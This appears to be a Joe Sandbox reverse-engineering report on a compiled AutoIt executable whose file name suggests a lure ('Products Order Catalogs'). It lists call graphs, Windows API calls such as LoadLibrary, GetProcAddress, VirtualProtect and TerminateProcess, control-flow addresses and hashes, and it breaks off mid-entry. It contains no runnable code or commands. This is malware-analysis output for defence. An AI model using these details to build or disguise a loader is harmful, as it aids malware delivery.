75 API calls 84899 42dd10 VariantInit VariantCopy 84895->84899 84896->84866 84896->84880 84896->84881 84896->84882 84896->84885 84896->84886 84896->84890 84896->84894 84896->84895 85127 46e9cd 75 API calls 84896->85127 85128 409210 VariantClear 84896->85128 85129 44cc6c VariantClear ctype 84896->85129 84897 40a8b0 84909 40a8c2 ctype 84897->84909 85133 40e380 VariantClear ctype 84897->85133 84898 42e312 84900 42e337 VariantClear 84898->84900 84898->84909 84899->84896 84901 42dd30 VariantClear 84899->84901 84900->84909 84901->84896 84904 40a7ee 84902->84904 84906 42e2a7 VariantClear 84902->84906 84902->84914 84904->84914 85132 40e380 VariantClear ctype 84904->85132 84905 42e3b2 84910 42e3da VariantClear 84905->84910 84915 40a91a ctype 84905->84915 84906->84914 84907 40a908 84907->84915 85134 40e380 VariantClear ctype 84907->85134 84909->84905 84909->84907 84910->84915 84912 42e47f 84917 42e4a3 VariantClear 84912->84917 84922 40a957 ctype 84912->84922 84914->84897 84914->84898 84915->84912 84916 40a945 84915->84916 84916->84922 85135 40e380 VariantClear ctype 84916->85135 84917->84922 84919 40aa22 ctype 84919->84715 84920 42e559 VariantClear 84920->84922 84922->84919 84922->84920 85136 40e380 VariantClear ctype 84922->85136 84923->84679 84924->84711 84925->84711 84926->84711 84927->84711 84928->84711 84929->84711 84931 40412e 84930->84931 84932 4092c0 VariantClear 84931->84932 84933 404138 84932->84933 84933->84703 84934->84711 84935->84711 84936->84715 84937->84678 84938->84715 84939->84715 84940->84721 84941->84724 84942->84738 84943->84740 84944->84728 84945->84749 84946->84766 84947->84773 84948->84749 84949->84750 84950->84749 84951->84750 84952->84749 84953->84759 84954->84750 84955->84762 84956->84750 84957->84756 84958->84780 84960 4092c0 VariantClear 84959->84960 84961 40416e 84960->84961 84962 404120 VariantClear 84961->84962 84963 40419b 84962->84963 84969 40efe0 84963->84969 84977 4734b7 84963->84977 84964 4041c6 84964->84777 84964->84788 84967->84777 84968->84779 84970 40eff5 CreateFileW 84969->84970 84971 4299bf 84969->84971 84972 40f017 84970->84972 84971->84972 84973 4299c4 CreateFileW 84971->84973 84972->84964 84973->84972 84974 4299ea 84973->84974 85021 40e0d0 SetFilePointerEx SetFilePointerEx 84974->85021 84976 4299f5 84976->84972 84978 453063 111 API calls 84977->84978 84979 4734d7 84978->84979 84980 473545 84979->84980 84981 47350c 84979->84981 85022 463c42 84980->85022 84983 4092c0 VariantClear 84981->84983 84988 473514 84983->84988 84984 473558 84985 47355c 84984->84985 85001 473595 84984->85001 84986 4092c0 VariantClear 84985->84986 84996 473564 84986->84996 84987 473616 85035 463d7e 84987->85035 84988->84964 84990 453063 111 API calls 84990->85001 84991 473622 84992 473697 84991->84992 84993 47362c 84991->84993 85069 457838 84992->85069 84997 4092c0 VariantClear 84993->84997 84996->84964 84999 473634 84997->84999 84999->84964 85000 473655 85003 4092c0 VariantClear 85000->85003 85001->84987 85001->84990 85001->85000 85081 462f5a 87 API calls __wcsicoll 85001->85081 85015 47365d 85003->85015 85005 4736b0 85082 45e62e 116 API calls 3 library calls 85005->85082 85006 4736c9 85083 40e7e0 76 API calls 85006->85083 85009 4736ba GetCurrentProcess TerminateProcess 85009->85006 85010 4736db 85019 4736ff 85010->85019 85084 40d030 76 API calls 85010->85084 85012 473731 85017 473744 FreeLibrary 85012->85017 85018 47374b 85012->85018 85013 4736f1 85085 46b945 134 API calls 2 library calls 85013->85085 85015->84964 85017->85018 85018->84964 85019->85012 85086 40d030 76 API calls 85019->85086 85087 46b945 134 API calls 2 library calls 85019->85087 85021->84976 85088 45335b 76 API calls 85022->85088 85024 463c5d 85089 442c52 80 API calls _wcslen 85024->85089 85026 463c72 85028 40c060 75 API calls 85026->85028 85034 463cac 85026->85034 85029 463c8e 85028->85029 85090 4608ce 75 API calls _memcpy_s 85029->85090 85031 463ca4 85032 40c740 75 API calls 85031->85032 85032->85034 85033 463cf7 85033->84984 85034->85033 85091 462f5a 87 API calls __wcsicoll 85034->85091 85036 453063 111 API calls 85035->85036 85037 463d99 85036->85037 85038 463de0 85037->85038 85039 463dca 85037->85039 85093 40c760 78 API calls 85038->85093 85092 453081 111 API calls 85039->85092 85042 463dd0 LoadLibraryW 85044 463e09 85042->85044 85043 463de7 85048 463e19 85043->85048 85094 40c760 78 API calls 85043->85094 85045 463e3e 85044->85045 85044->85048 85050 463e4e 85045->85050 85051 463e7b 85045->85051 85047 463dfb 85047->85048 85095 40c760 78 API calls 85047->85095 85048->84991 85096 40d500 75 API calls 85050->85096 85098 40c760 78 API calls 85051->85098 85054 463e57 85097 45efe7 77 API calls ctype 85054->85097 85055 463e82 GetProcAddress 85058 463e90 85055->85058 85057 463e62 GetProcAddress 85060 463e79 85057->85060 85058->85048 85059 463edf 85058->85059 85058->85060 85059->85048 85062 463eef FreeLibrary 85059->85062 85060->85058 85099 403470 75 API calls _memcpy_s 85060->85099 85062->85048 85063 463eb4 85100 40d500 75 API calls 85063->85100 85065 463ebd 85101 45efe7 77 API calls ctype 85065->85101 85067 463ec8 GetProcAddress 85102 401330 ctype 85067->85102 85070 457a4c 85069->85070 85071 45785f _strcat _wcslen _wcscpy ctype 85069->85071 85077 410d40 85070->85077 85071->85070 85072 40c760 78 API calls 85071->85072 85073 453081 111 API calls 85071->85073 85074 443576 78 API calls 85071->85074 85075 4138ba 67 API calls _malloc 85071->85075 85076 40f580 77 API calls 85071->85076 85072->85071 85073->85071 85074->85071 85075->85071 85076->85071 85079 410d55 85077->85079 85078 410ded VirtualProtect 85080 410dbb 85078->85080 85079->85078 85079->85080 85080->85005 85080->85006 85081->85001 85082->85009 85083->85010 85084->85013 85085->85019 85086->85019 85087->85019 85088->85024 85089->85026 85090->85031 85091->85033 85092->85042 85093->85043 85094->85047 85095->85044 85096->85054 85097->85057 85098->85055 85099->85063 85100->85065 85101->85067 85102->85059 85103->84798 85104->84888 85105->84807 85106->84812 85107->84853 85108->84853 85109->84919 85110->84853 85111->84853 85112->84829 85113->84847 85114->84851 85115->84822 85116->84826 85117->84830 85118->84883 85119->84883 85120->84883 85121->84883 85122->84883 85123->84844 85124->84860 85125->84859 85126->84875 85127->84896 85128->84896 85129->84896 85130->84888 85131->84902 85132->84914 85133->84909 85134->84915 85135->84922 85136->84922 85137->84860 85138->84816 85139 42919b 85144 40ef10 85139->85144 85142 411421 __cinit 74 API calls 85143 4291aa 85142->85143 85145 41171a 75 API calls 85144->85145 85146 40ef17 85145->85146 85147 42ad48 85146->85147 85152 40ef40 74 API calls __cinit 85146->85152 85149 40ef2a 85153 40e470 85149->85153 85152->85149 85154 40c060 75 API calls 85153->85154 85155 40e483 GetVersionExW 85154->85155 85156 4021e0 75 API calls 85155->85156 85157 40e4bb 85156->85157 85179 40e600 85157->85179 85164 42accc 85165 42ad28 GetSystemInfo 85164->85165 85169 42ad38 GetSystemInfo 85165->85169 85166 40e557 GetCurrentProcess 85199 40ee30 LoadLibraryA GetProcAddress 85166->85199 85167 40e56c 85167->85169 85192 40eee0 85167->85192 85172 40e5c9 85196 40eea0 85172->85196 85175 40e5e0 85177 40e5f1 FreeLibrary 85175->85177 85178 40e5f4 85175->85178 85176 40e5dd FreeLibrary 85176->85175 85177->85178 85178->85142 85180 40e60b 85179->85180 85181 40c740 75 API calls 85180->85181 85182 40e4c2 85181->85182 85183 40e620 85182->85183 85184 40e62a 85183->85184 85185 42ac93 85184->85185 85186 40c740 75 API calls 85184->85186 85187 40e4ce 85186->85187 85187->85164 85188 40ee70 85187->85188 85189 40e551 85188->85189 85190 40ee76 LoadLibraryA 85188->85190 85189->85166 85189->85167 85190->85189 85191 40ee87 GetProcAddress 85190->85191 85191->85189 85193 40e5bf 85192->85193 85194 40eee6 LoadLibraryA 85192->85194 85193->85165 85193->85172 85194->85193 85195 40eef7 GetProcAddress 85194->85195 85195->85193 85200 40eec0 LoadLibraryA GetProcAddress 85196->85200 85198 40e5d3 GetNativeSystemInfo 85198->85175 85198->85176 85199->85167 85200->85198 85201 42e89e 85208 40c000 85201->85208 85203 42e8ac 85204 409a40 165 API calls 85203->85204 85205 42e8ca 85204->85205 85219 44b92e VariantClear 85205->85219 85207 42f3ae 85209 40c014 85208->85209 85210 40c007 85208->85210 85212 40c01a 85209->85212 85213 40c02c 85209->85213 85220 409210 VariantClear 85210->85220 85221 409210 VariantClear 85212->85221 85214 41171a 75 API calls 85213->85214 85218 40c033 85214->85218 85215 40c00f 85215->85203 85217 40c023 85217->85203 85218->85203 85219->85207 85220->85215 85221->85217
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00409A61
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                • String ID: 0vH$4RH
                                                                                                • API String ID: 1143807570-2085553193
                                                                                                • Opcode ID: 46287a7bb28814e7acc9e24331a329a483cab8fdfa0313037193f1b97064f243
                                                                                                • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                                • Opcode Fuzzy Hash: 46287a7bb28814e7acc9e24331a329a483cab8fdfa0313037193f1b97064f243
                                                                                                • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1266 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1275 40e506-40e509 1266->1275 1276 42accc-42acd1 1266->1276 1279 40e540-40e555 call 40ee70 1275->1279 1280 40e50b-40e51c 1275->1280 1277 42acd3-42acdb 1276->1277 1278 42acdd-42ace0 1276->1278 1282 42ad12-42ad20 1277->1282 1283 42ace2-42aceb 1278->1283 1284 42aced-42acf0 1278->1284 1293 40e557-40e573 GetCurrentProcess call 40ee30 1279->1293 1294 40e579-40e5a8 1279->1294 1285 40e522-40e525 1280->1285 1286 42ac9b-42aca7 1280->1286 1292 42ad28-42ad2d GetSystemInfo 1282->1292 1283->1282 1284->1282 1290 42acf2-42ad06 1284->1290 1285->1279 1291 40e527-40e537 1285->1291 1288 42acb2-42acba 1286->1288 1289 42aca9-42acad 1286->1289 1288->1279 1289->1279 1295 42ad08-42ad0c 1290->1295 1296 42ad0e 1290->1296 1297 42acbf-42acc7 1291->1297 1298 40e53d 1291->1298 1300 42ad38-42ad3d GetSystemInfo 1292->1300 1293->1294 1307 40e575 1293->1307 1294->1300 1301 40e5ae-40e5c3 call 40eee0 1294->1301 1295->1282 1296->1282 1297->1279 1298->1279 1301->1292 1306 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1301->1306 1310 40e5e0-40e5ef 1306->1310 1311 40e5dd-40e5de FreeLibrary 1306->1311 1307->1294 1312 40e5f1-40e5f2 FreeLibrary 1310->1312 1313 40e5f4-40e5ff 1310->1313 1311->1310 1312->1313
                                                                                                APIs
                                                                                                • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                                • String ID: pMH
                                                                                                • API String ID: 2923339712-2522892712
                                                                                                • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: IsThemeActive$uxtheme.dll
                                                                                                • API String ID: 2574300362-3542929980
                                                                                                • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                • __wsplitpath.LIBCMT ref: 00410C61
                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                • _wcsncat.LIBCMT ref: 00410C78
                                                                                                • __wmakepath.LIBCMT ref: 00410C94
                                                                                                  • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                • _wcscpy.LIBCMT ref: 00410CCC
                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                • _wcscat.LIBCMT ref: 00429C43
                                                                                                • _wcslen.LIBCMT ref: 00429C55
                                                                                                • _wcslen.LIBCMT ref: 00429C66
                                                                                                • _wcscat.LIBCMT ref: 00429C80
                                                                                                • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                • API String ID: 1004883554-2276155026
                                                                                                • Opcode ID: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                • Opcode Fuzzy Hash: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                                                APIs
                                                                                                  • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                                                                                  • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                                                • timeGetTime.WINMM ref: 00409880
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharSleepTimeUpper_wcslentime
                                                                                                • String ID:
                                                                                                • API String ID: 3219444185-0
                                                                                                • Opcode ID: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
                                                                                                • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                                                • Opcode Fuzzy Hash: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
                                                                                                • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1156 4161c2-4161d1 1157 4161d3-4161df 1156->1157 1158 4161fa 1156->1158 1157->1158 1159 4161e1-4161e8 1157->1159 1160 4161fd-416209 call 41aa31 1158->1160 1159->1158 1161 4161ea-4161f8 1159->1161 1164 416213-41621a call 416e29 1160->1164 1165 41620b-416212 call 41616a 1160->1165 1161->1160 1170 416224-416233 call 41843a call 41b669 1164->1170 1171 41621c-416223 call 41616a 1164->1171 1165->1164 1178 416235-41623c call 4117af 1170->1178 1179 41623d-416258 GetCommandLineW call 42235f call 4222b1 1170->1179 1171->1170 1178->1179 1186 416262-416269 call 422082 1179->1186 1187 41625a-416261 call 4117af 1179->1187 1192 416273-41627c call 41186e 1186->1192 1193 41626b-416272 call 4117af 1186->1193 1187->1186 1198 416285-41628d call 42203c 1192->1198 1199 41627e-416284 call 4117af 1192->1199 1193->1192 1204 416295-416297 1198->1204 1205 41628f-416293 1198->1205 1199->1198 1206 416298-4162a0 call 40d7f0 1204->1206 1205->1206 1208 4162a5-4162ab 1206->1208 1209 4162b3-41630f call 411a4b call 4171d1 1208->1209 1210 4162ad-4162ae call 411a1f 1208->1210 1210->1209
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                                                                • String ID:
                                                                                                • API String ID: 2477803136-0
                                                                                                • Opcode ID: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                                                                                • Instruction ID: 5d71fe406d9f608d9de966b229f2038f561e79c4b175df4472a1e640f9164680
                                                                                                • Opcode Fuzzy Hash: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                                                                                • Instruction Fuzzy Hash: 6A21A671D00315A9DB14BBB2A9467EE2664AF1074CF1144AFF9056A2D3EEBCC8C1461D

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                • String ID: FILE
                                                                                                • API String ID: 3888824918-3121273764
                                                                                                • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                                • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetSysColorBrush.USER32 ref: 00410326
                                                                                                • RegisterClassExW.USER32 ref: 00410359
                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                • ImageList_ReplaceIcon.COMCTL32(00C7FE38,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                • API String ID: 2914291525-1005189915
                                                                                                • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                • RegisterClassExW.USER32 ref: 004102C6
                                                                                                  • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                  • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                  • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                  • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                  • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                  • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                  • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00C7FE38,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
